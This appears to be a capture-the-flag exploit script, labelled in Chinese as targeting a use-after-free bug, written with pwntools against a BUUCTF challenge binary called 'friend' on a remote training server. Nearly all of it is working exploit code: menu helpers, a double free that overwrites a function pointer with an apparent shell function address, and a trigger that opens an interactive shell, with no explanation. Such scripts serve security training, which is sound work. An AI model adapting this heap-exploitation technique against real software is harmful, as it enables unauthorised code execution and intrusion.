漏洞点:uaf
exp:
from pwn import *
p=remote('node4.buuoj.cn',25968)
# p=process('./friend')
elf=ELF('./friend')
def add(size,name):
p.sendlineafter("Your choice :",'1')
p.sendlineafter("Her name size is :",str(size))
p.sendlineafter("Her name is :",name)
def delete(index):
p.sendlineafter("Your choice :",'2')
p.sendlineafter("Index :",str(index))
def show(index):
p.sendlineafter("Your choice :",'3')
p.sendlineafter("Index :",str(index))
def dbg():
gdb.attach(p)
pause()
buf = 0x6020A0
sh = 0x400b9c
add(0x20,'aaaa')#0
add(0x20,'aaaa')#1
delete(0)
delete(1)
delete(0)
add(0x10,p64(sh))#2
show(1)
p.interactive()